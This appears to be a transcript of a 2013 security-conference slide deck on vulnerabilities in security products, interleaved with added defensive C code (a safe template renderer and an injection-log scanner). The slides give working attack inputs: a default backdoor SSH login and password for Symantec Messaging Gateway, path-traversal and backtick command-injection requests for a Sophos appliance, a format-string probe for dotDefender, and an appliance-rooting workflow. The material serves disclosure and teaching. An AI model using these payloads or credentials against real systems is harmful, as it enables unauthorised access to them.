Alexander Antukh


  1. Insecurity Software
     PHDays 2013
     Version: 1.0
     Author: Alexander Antukh
     Responsible: Alexander Antukh
     Date: 24.05.2013
     Confidentiality: Public
  2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
     Agenda
     • Introduction
     • What is Security Software
     • Historical review
     • The Question
     • The Answer
     • Vuln, where art thou?
     • Afterword
     • QA
  3. SEC Consult – Who we are
     (Map: SEC Consult offices, headquarters and clients in Austria, Germany, Lithuania, Singapore, Canada, India, the USA and Central and Eastern Europe)
     • Leading international application security consultancy
     • Founded 2002
     • Headquarters near Vienna, Austria
     • Delivery Centers in Austria, Germany, Lithuania and Singapore
     • Strong customer base in Central and Eastern Europe
     • Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)
     • 35+ application security experts
     • Industry focus: banks, software vendors, government
  4. Alexander Antukh – Whoami
     • Security consultant
     • Offensive Security Certified Expert
     • Defcon Moscow Local Group Coordinator
     *kidhacker
  5. Agenda
     • Introduction
     • What is Security Software
     • Historical review
     • The Question
     • The Answer
     • Vuln, where art thou?
     • Afterword
     • QA
  6. What is Security Software
     “A generic term referring to any computer program or library whose purpose is to (help to) secure a computer system or a computer network”
  7. What is Security Software
     The keyword in all the security software is…
  8. What is Security Software
  9. What is Security Software
     In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”
  10. Agenda
      • Introduction
      • What is Security Software
      • Historical review
      • The Question
      • The Answer
      • Vuln, where art thou?
      • Afterword
      • QA
  11. Historical review – Firewall
      Evolution: Packet filter → Stateful FW → App layer FW
      First appearance: 1988
      First *registered* exploit: 1995
      Objective: control network traffic and determine if it’s good enough to pass
  12. Historical review – ID(P)S
      Ceci n‘est pas un firewall... (“This is not a firewall...”)
      Statistical anomaly-based / Signature-based
      Passive (detection) / Reactive (prevention)
      First appearance: 1986
      First *registered* hack: 1999
      Objective: monitor for malicious activities or policy violations (heuristics, signatures...)
  13. Historical review – AntiSpam
      AntiSpam evolution: Del → Keywords → Blacklists → Auth → Protocol analysis → Filtering
      First appearance: Monty Python
      First PoC: 1978
      Industrial scale: 1994 - ...
      CAN-SPAM Act of 2003: spam is legal
  14. Historical review – Anti-sniffing
      First registered hack: 1903 (OSVDB-ID: 79399, 79400)
      Nevil Maskelyne
      “… I did it for the lulz”
      Today it’s net configuration, encryption and IDS/IPS
  15. Historical review – Anti-virus
      First „viruses“: 1971
      First viruses: mid-1980s
      First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT)
      Virus evolution: Benign → Destructive → $$$$$
  16. Historical review
      AV companies don’t stand still…
  17. Historical review
      … neither do other SS products
  18. Agenda
      • Introduction
      • What is Security Software
      • Historical review
      • The Question
      • The Answer
      • Vuln, where art thou?
      • Afterword
      • QA
  19. The question
      Do you know anybody less boring?
      What if the SS is vulnerable itself?
  20. The answer
      *sorry for my English
  21. Déjà vu (slide from PHDays 2012)
      • Reverse engineering
        Checkpoint – Client side remote command execution (multiple Checkpoint appliances, CVE-2011-1827)
      • Fuzzing
        F5 FirePass SSL VPN – Remote command execution (CVE-2012-1777)
      • Application testing
        Microsoft ASP.Net – Authentication bypass (Microsoft Security Bulletin MS11-100 - Critical: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420), CVE-2011-3416)
      Security software products will be the target of the trade ... soon!
  22. The time has come!
  23. The answer
      • Symantec Messaging Gateway – Backdoor by design → Code execution
      • F5 BIG-IP – SQL Injection, XXE → Passwords… Root access
      • Applicure dotDefender WAF – Format string vulnerability → Code execution
      • Sophos Web Protection Appliance – LFI, OS Command Injection → Command execution, admin account pwn
      Security software products are the target of the trade ... already!
  24. The answer – Symantec Messaging Gateway v.9.5.x
      “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“
      SSH?!
      Login: support
      MD5: 52e3bbafc627009ac13caff1200a0dbf
      Password: symantec
  25. The answer – F5 BIG-IP <= 11.2.0
      “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“
  26. The answer – F5 BIG-IP <= 11.2.0 (same quote as slide 25)
      sam/admin/reports/php/getSettings.php
  27. The answer – AppliCure dotDefender WAF <= 4.26
      “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“
      Web Attack?
  28. The answer – AppliCure dotDefender WAF <= 4.26
      Error page can be configured in different ways:
      Vars to be added to the body of a custom page:
      • %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
      • %RID% - reference ID
      • %IP% - server’s IP address
      • %DATE_TIME% - date of blocked request
      Looks nice…
  29. The answer – AppliCure dotDefender WAF <= 4.26
      Format string injection
      Algorithm:
      • Variables
      • Buffer
      • ...
      • AP_PRINTF()
      Check for format string vulnerabilities… should be: <%IP%> Host: …
      %666dxBAxADxBExEF…
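Slides 28 and 29 describe the pattern behind the dotDefender finding: the custom block page is expanded into a buffer that also carries request data, and that buffer then reaches a printf-style function as its format argument. The following is an added example written for this transcript, not code from the slides or from dotDefender; `struct block_ctx`, the `%HOST%` variable (standing in for the attacker-controlled Host header the slide hints at) and all function names are this example's own assumptions. It shows the safe way to emit a rendered page (as data, via `fputs`), a check that tells you when the rendered text would be interpreted as printf directives, and a percent-escaping fallback for legacy paths that cannot stop using a format parameter.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical per-request data for the block page (names are this example's, not dotDefender's). */
struct block_ctx {
    const char *ip;         /* %IP%: server's IP address */
    const char *rid;        /* %RID%: reference ID */
    const char *date_time;  /* %DATE_TIME%: date of blocked request */
    const char *mailto;     /* %MAILTO_BLOCK%: report address */
    const char *host;       /* %HOST%: request Host header, i.e. attacker-controlled bytes */
};

/* Resolve a variable name of the given length; NULL if unknown. */
static const char *lookup_var(const struct block_ctx *c, const char *name, size_t len) {
    const struct { const char *n; const char *v; } vars[] = {
        {"IP", c->ip}, {"RID", c->rid}, {"DATE_TIME", c->date_time},
        {"MAILTO_BLOCK", c->mailto}, {"HOST", c->host},
    };
    for (size_t i = 0; i < sizeof vars / sizeof vars[0]; i++)
        if (strlen(vars[i].n) == len && memcmp(vars[i].n, name, len) == 0)
            return vars[i].v;
    return NULL;
}

/* Append n bytes to a growable, NUL-terminated buffer; 0 on allocation failure. */
static int append(char **buf, size_t *len, size_t *cap, const char *s, size_t n) {
    if (*len + n + 1 > *cap) {
        size_t ncap = (*len + n + 1) * 2;
        char *nb = realloc(*buf, ncap);
        if (!nb) return 0;
        *buf = nb; *cap = ncap;
    }
    memcpy(*buf + *len, s, n);
    *len += n;
    (*buf)[*len] = '\0';
    return 1;
}

/* Expand %NAME% tokens in tmpl. Substituted values are copied as plain bytes and
   never rescanned; unknown tokens and lone '%' pass through. Caller frees. */
char *render_block_page(const char *tmpl, const struct block_ctx *c) {
    size_t cap = 64, len = 0;
    char *out = malloc(cap);
    if (!out) return NULL;
    out[0] = '\0';
    for (const char *p = tmpl; *p; ) {
        const char *end;
        if (*p == '%' && (end = strchr(p + 1, '%')) != NULL) {
            const char *val = lookup_var(c, p + 1, (size_t)(end - p - 1));
            if (val) {
                if (!append(&out, &len, &cap, val, strlen(val))) { free(out); return NULL; }
                p = end + 1;
                continue;
            }
        }
        if (!append(&out, &len, &cap, p, 1)) { free(out); return NULL; }
        p++;
    }
    return out;
}

/* 1 if s holds a '%' that a printf-family function would treat as a conversion
   (anything other than the literal "%%"). */
int contains_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

/* Defence in depth for legacy paths that still pass the page through a
   printf-family format parameter: double every '%' so it prints literally. */
char *escape_percent(const char *s) {
    size_t n = 0;
    for (const char *p = s; *p; p++) n += (*p == '%') ? 2 : 1;
    char *out = malloc(n + 1), *q = out;
    if (!out) return NULL;
    for (const char *p = s; *p; p++) { *q++ = *p; if (*p == '%') *q++ = '%'; }
    *q = '\0';
    return out;
}

int main(void) {
    /* Constructed request: the Host header carries a printf conversion. */
    struct block_ctx c = {"10.0.0.1", "RID-0001", "24.05.2013 12:00",
                          "admin@example.com", "%666d"};
    char *page = render_block_page("<%IP%> Host: %HOST% (ref %RID%)", &c);
    if (!page) return 1;
    if (contains_format_directive(page))
        fputs("note: page holds printf conversions; it must be output as data\n", stderr);
    fputs(page, stdout);   /* correct: the page is the data argument, never the format */
    fputc('\n', stdout);
    char *esc = escape_percent(page);
    if (esc) { fputs(esc, stdout); fputc('\n', stdout); free(esc); }
    free(page);
    return 0;
}
```

The design point is in `render_block_page`: substituted values are copied as bytes and never rescanned, so a `%666d` arriving in a header stays inert as long as the output function treats the page as data. `contains_format_directive` is the check to wire into a test suite around any code path that still ends in a printf-family call with a non-literal format.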
  30. The answer – Sophos Web Protection Appliance <= 3.7.8.1
      “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“
      https://<host>/cgi-bin/patience.cgi?id=..
      ?id=../../persist/config/shared.conf%00
      ?id=../../log/ui_access_log%00
      "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
      Passwords!
  31. The answer – Sophos Web Protection Appliance <= 3.7.8.1 (same quote as slide 30)
      Diagnostic Tools – `
      POST /index.php?c=diagnostic_tools HTTP/1.1
      ...
      action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
  32. The answer – Sophos Web Protection Appliance <= 3.7.8.1 (same quote as slide 30)
      Block page (%%user_workstation%%“) – `
      https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60
  33. The answer – Sophos Web Protection Appliance <= 3.7.8.1 (same quote as slide 30)
      Local Site List – `
      POST /index.php?c=local_site_list_editor HTTP/1.1
      ...
      STYLE=<validsessid>&action=save&entries=[{"url"%3a+".`sleep+10`",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
  34. The answer – Sophos Web Protection Appliance <= 3.7.8.1
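Slides 30 to 33 show the two indicator families behind the Sophos findings: a null byte and directory traversal in the `patience.cgi` `id` parameter, and shell backticks (raw or as `%60`) in form and query parameters. The following added example, written for this transcript and not taken from the slides or from Sophos, scans access-log lines in the `"<url>" "<user-agent>"` shape slide 30 shows and flags those indicators after percent-decoding, which is where naive string matching on the raw request misses `%60` and `%00`. The sample log lines are constructed, `<host>` and `<validsessid>` are the placeholders the slides use, and all function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

enum { IND_BACKTICK = 1, IND_NULBYTE = 2, IND_TRAVERSAL = 4 };

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* One pass of percent-decoding; '+' becomes a space. Returns bytes written.
   NUL bytes are kept, so the output is length-delimited, not NUL-terminated. */
size_t url_decode(const char *in, unsigned char *out, size_t cap) {
    size_t n = 0;
    for (; *in && n < cap; in++) {
        if (*in == '%' && hexval(in[1]) >= 0 && hexval(in[2]) >= 0) {
            out[n++] = (unsigned char)(hexval(in[1]) * 16 + hexval(in[2]));
            in += 2;
        } else if (*in == '+') {
            out[n++] = ' ';
        } else {
            out[n++] = (unsigned char)*in;
        }
    }
    return n;
}

/* Length-aware substring search (the buffer may contain NUL bytes). */
static int contains_bytes(const unsigned char *buf, size_t len, const char *pat) {
    size_t plen = strlen(pat);
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0) return 1;
    return 0;
}

/* Bitmask of indicators found in a request target (path + query) or form body. */
int injection_indicators(const char *target) {
    unsigned char dec[4096];
    size_t len = url_decode(target, dec, sizeof dec);
    int flags = 0;
    if (memchr(dec, '`', len))  flags |= IND_BACKTICK;   /* shell command substitution */
    if (memchr(dec, '\0', len)) flags |= IND_NULBYTE;    /* %00: string truncation */
    if (contains_bytes(dec, len, "../")) flags |= IND_TRAVERSAL;
    return flags;
}

/* Copy the first double-quoted field of a log line (the request URL) into out. */
static int first_quoted_field(const char *line, char *out, size_t cap) {
    const char *start = strchr(line, '"');
    if (!start) return 0;
    const char *end = strchr(start + 1, '"');
    if (!end || (size_t)(end - start - 1) >= cap) return 0;
    memcpy(out, start + 1, (size_t)(end - start - 1));
    out[end - start - 1] = '\0';
    return 1;
}

/* Number of log lines whose request URL carries at least one indicator. */
size_t count_suspicious(const char *const *lines, size_t n) {
    size_t hits = 0;
    char url[4096];
    for (size_t i = 0; i < n; i++)
        if (first_quoted_field(lines[i], url, sizeof url) && injection_indicators(url))
            hits++;
    return hits;
}

/* Constructed sample lines in the shape shown on slide 30 (not real appliance logs). */
static const char *const SAMPLE_LOG[] = {
    "\"https://<host>/index.php?section=configuration&c=configuration&STYLE=<validsessid>\" "
    "\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"",
    "\"https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\" "
    "\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"",
    "\"https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\" "
    "\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"",
};

int main(void) {
    size_t n = sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0];
    for (size_t i = 0; i < n; i++) {
        char url[4096];
        int f = first_quoted_field(SAMPLE_LOG[i], url, sizeof url) ? injection_indicators(url) : 0;
        printf("%-5s %-5s %-5s %s\n", f & IND_NULBYTE ? "[NUL]" : "", f & IND_TRAVERSAL ? "[../]" : "",
               f & IND_BACKTICK ? "[`]" : "", url);
    }
    printf("%zu of %zu lines flagged\n", count_suspicious(SAMPLE_LOG, n), n);
    return 0;
}
```

Decoding once before matching is the important part: the appliance decodes the parameter before it reaches the file system or the shell, so a detector has to look at the same bytes the target sees. For a WAF or IDS rule, the same three checks map onto a decoded-parameter inspection rather than a raw-URI regex.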
  35. Agenda
      • Introduction
      • What is Security Software
      • Historical review
      • The Question
      • The Answer
      • Vuln, where art thou?
      • Afterword
      • QA
  36. Vuln, where art thou?
      • Methods for identifying usable bugs in “Software products”
        • Application testing and Fuzzing
        • Reverse engineering
        • Source code analysis
      • A short note on so called “security scanning” tools
  37. Vuln, where art thou?
      • The workflow for the appliance analysis is pretty simple!
        • get a virtual appliance demo version
        • install the appliance
        • add the .vmdk to another VM and mount it there (or use a Linux fs driver that can mount vmdk files)
        • add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
        • start the appliance again and log in :)
        • look at the services that are running (and their configuration)
        • pwnage ;)
  38. Vuln, where art thou?
      *Move two matches to make it three equal squares
  39. Vuln, where art thou?
      Start me up!
  40. Agenda
      • Introduction
      • What is Security Software
      • Historical review
      • The Question
      • The Answer
      • Vuln, where art thou?
      • Afterword
      • QA
  41. And now for something completely different
      Sometimes it’s easier to find the vulnerability than might be expected . . .
      *doesn’t exist yet
  42. QA
